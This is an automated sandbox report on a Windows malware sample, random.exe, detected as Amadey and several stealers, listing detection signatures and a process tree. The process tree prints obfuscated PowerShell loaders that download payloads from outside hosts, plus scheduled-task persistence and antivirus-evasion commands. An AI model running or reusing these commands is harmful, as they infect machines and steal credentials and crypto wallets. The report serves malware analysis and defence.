Edit tour

Windows Analysis Report
random.exe

Overview

General Information

Sample name:	random.exe
Analysis ID:	1610571
MD5:	6236a0f253b635db9dc436bcdf8760f1
SHA1:	ed4fd3548ba42beca7fbc73538b2097c7677d10b
SHA256:	f758d7e254cb8fcd0f8fcbeea716ccee5305acc4279c94d367c71d75fcea3b42
Tags:	Amadeyexeuser-aachum
Infos:

Detection

Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: Powershell download and load assembly

Sigma detected: Powershell download payload from hardcoded c2 list

Sigma detected: Search for Antivirus process

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected AsyncRAT

Yara detected LummaC Stealer

Yara detected Powershell decode and execute

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

.NET source code contains method to dynamically call methods (often used by packers)

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Creates multiple autostart registry keys

Drops PE files with a suspicious file extension

Drops script or batch files to the startup folder

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Base64 Encoded PowerShell Command Detected

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Suspicious powershell command line found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

Wscript starts Powershell (via cmd or directly)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Connects to several IPs in different countries

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Drops PE files

Enables debug privileges

Entry point lies outside standard sections

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

random.exe (PID: 7336 cmdline: "C:\Users\user\Desktop\random.exe" MD5: 6236A0F253B635DB9DC436BCDF8760F1)

skotes.exe (PID: 7552 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 6236A0F253B635DB9DC436BCDF8760F1)

skotes.exe (PID: 7672 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6236A0F253B635DB9DC436BCDF8760F1)

skotes.exe (PID: 8164 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 6236A0F253B635DB9DC436BCDF8760F1)

dfd80aba08.exe (PID: 3164 cmdline: "C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe" MD5: E6B7110E2C6E144296651B80F9B92A47)

PAL947G2R107U02V5ZPL.exe (PID: 2084 cmdline: "C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe" MD5: ADB822A9A629882B5444563CF0B010DF)

FQZHGI4TELUEK712J739LWFDT7.exe (PID: 6616 cmdline: "C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe" MD5: 6236A0F253B635DB9DC436BCDF8760F1)

ae70ca0159.exe (PID: 7396 cmdline: "C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe" MD5: ADB822A9A629882B5444563CF0B010DF)

487dac876e.exe (PID: 7596 cmdline: "C:\Users\user\AppData\Local\Temp\1072546001\487dac876e.exe" MD5: C3D89E95BFB66F5127AC1F2F3E1BD665)

cmd.exe (PID: 3844 cmdline: "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7752 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7764 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7796 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7804 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7856 cmdline: cmd /c md 764661 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

extrac32.exe (PID: 2256 cmdline: extrac32 /Y /E Fm MD5: 9472AAB6390E4F1431BAA912FCFF9707)

findstr.exe (PID: 5088 cmdline: findstr /V "Tunnel" Addresses MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 5868 cmdline: cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 332 cmdline: cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Macromedia.com (PID: 3300 cmdline: Macromedia.com F MD5: 62D09F076E6E0240548C2F837536A46A)

schtasks.exe (PID: 6112 cmdline: schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 3604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 8036 cmdline: choice /d y /t 15 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

e2b0a87ceb.exe (PID: 2416 cmdline: "C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe" MD5: E9EE9E540253F60D0F0F6EFD140E524F)

e2b0a87ceb.exe (PID: 2668 cmdline: "C:\Users\user\AppData\Local\Temp\1072547001\e2b0a87ceb.exe" MD5: E9EE9E540253F60D0F0F6EFD140E524F)

WerFault.exe (PID: 8084 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2416 -s 940 MD5: C31336C1EFC2CCB44B4326EA793040F2)

5a4a47dccd.exe (PID: 480 cmdline: "C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe" MD5: 8C6BAC3CE3F07DD9DBC8EB53E4BBB312)

loqVSeJ.exe (PID: 2692 cmdline: "C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe" MD5: F662CB18E04CC62863751B672570BD7D)

conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1072550041\b6V4Rod.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7780 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 416 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$cvIm='EntFeXgryPFeXgoinFeXgtFeXg'.Replace('FeXg', ''),'EleIXmOmeIXmOntIXmOAIXmOtIXmO'.Replace('IXmO', ''),'DecOszEomOszEprOszEeOszEsOszEsOszE'.Replace('OszE', ''),'CPUxvopPUxvyTPUxvoPUxv'.Replace('PUxv', ''),'RYWrpeaYWrpdLYWrpiYWrpnesYWrp'.Replace('YWrp', ''),'CgarcrgarcegarcategarcDgarcecgarcrgarcypgarctgarcorgarc'.Replace('garc', ''),'LoIVFlaIVFldIVFl'.Replace('IVFl', ''),'ChagsQKnggsQKeEgsQKxtgsQKegsQKnsgsQKiogsQKngsQK'.Replace('gsQK', ''),'MAaAUaiAaAUnAaAUModAaAUulAaAUeAaAU'.Replace('AaAU', ''),'SpojXFlitojXF'.Replace('ojXF', ''),'IFgBOnvFgBOokFgBOeFgBO'.Replace('FgBO', ''),'GevSbGtCuvSbGrrvSbGevSbGntvSbGPrvSbGovSbGcevSbGsvSbGsvSbG'.Replace('vSbG', ''),'TrUSbUansUSbUforUSbUmUSbUFiUSbUnaUSbUlBUSbUlUSbUockUSbU'.Replace('USbU', ''),'FriYUfoiYUfmiYUfBaiYUfse6iYUf4StiYUfriniYUfgiYUf'.Replace('iYUf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($cvIm[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function DsOlp($WSuTo){$fdRhP=[System.Security.Cryptography.Aes]::Create();$fdRhP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$fdRhP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$fdRhP.Key=[System.Convert]::($cvIm[13])('0L3qu7Et4bHK3WbvAGFJicWZ8cEspciFOjtqHmR81xg=');$fdRhP.IV=[System.Convert]::($cvIm[13])('JIfnsDyTRqTk8ftuN6oGsw==');$QWYHd=$fdRhP.($cvIm[5])();$FunRP=$QWYHd.($cvIm[12])($WSuTo,0,$WSuTo.Length);$QWYHd.Dispose();$fdRhP.Dispose();$FunRP;}function MmHQh($WSuTo){$zZDvJ=New-Object System.IO.MemoryStream(,$WSuTo);$rZPaI=New-Object System.IO.MemoryStream;$bbTac=New-Object System.IO.Compression.GZipStream($zZDvJ,[IO.Compression.CompressionMode]::($cvIm[2]));$bbTac.($cvIm[3])($rZPaI);$bbTac.Dispose();$zZDvJ.Dispose();$rZPaI.Dispose();$rZPaI.ToArray();}$zLeDh=[System.IO.File]::($cvIm[4])([Console]::Title);$QkJPW=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 5).Substring(2))));$gxzXU=MmHQh (DsOlp ([Convert]::($cvIm[13])([System.Linq.Enumerable]::($cvIm[1])($zLeDh, 6).Substring(2))));[System.Reflection.Assembly]::($cvIm[6])([byte[]]$gxzXU).($cvIm[0]).($cvIm[10])($null,$null);[System.Reflection.Assembly]::($cvIm[6])([byte[]]$QkJPW).($cvIm[0]).($cvIm[10])($null,$null); " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

powershell.exe (PID: 8068 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

Bjkm5hE.exe (PID: 6380 cmdline: "C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe" MD5: 0F2E0A4DAA819B94536F513D8BB3BFE2)

7fOMOTQ.exe (PID: 1196 cmdline: "C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe" MD5: B348884FC13A1A86E9E3A38A647CCD24)

750afc9298.exe (PID: 7796 cmdline: "C:\Users\user\AppData\Local\Temp\1072553001\750afc9298.exe" MD5: F071BEEBFF0BCFF843395DC61A8D53C8)

dDFw6mJ.exe (PID: 8012 cmdline: "C:\Users\user\AppData\Local\Temp\1072554001\dDFw6mJ.exe" MD5: DDBAC4A2E8251285D482AE1D2C1B6A58)

cmd.exe (PID: 6784 cmdline: cmd.exe /c 67a27a89a5061.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 8076 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a27a89a5061.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

powershell.exe (PID: 3796 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@I@B0@Hg@d@@u@FM@ZgBn@Go@ZwBq@Gs@LwBz@GU@b@Bp@GY@XwBj@Gk@b@Bi@HU@c@@v@DQ@Ng@u@DY@Mg@y@C4@M@@2@C4@Mg@2@C8@Lw@6@Cc@L@@g@Cc@M@@n@Cw@I@@n@FM@d@Bh@HI@d@B1@H@@TgBh@G0@ZQ@n@Cw@I@@n@E0@cwBi@HU@aQBs@GQ@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6404 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.Sfgjgjk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)

Fe36XBk.exe (PID: 1208 cmdline: "C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe" MD5: B1209205D9A5AF39794BDD27E98134EF)

8b3fbc1053.exe (PID: 6872 cmdline: "C:\Users\user\AppData\Local\Temp\1072556001\8b3fbc1053.exe" MD5: 351BE4440667DEC06B53848EAD73C950)

wscript.exe (PID: 6244 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

AchillesGuard.com (PID: 8092 cmdline: "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r" MD5: 62D09F076E6E0240548C2F837536A46A)

ae70ca0159.exe (PID: 1516 cmdline: "C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe" MD5: ADB822A9A629882B5444563CF0B010DF)

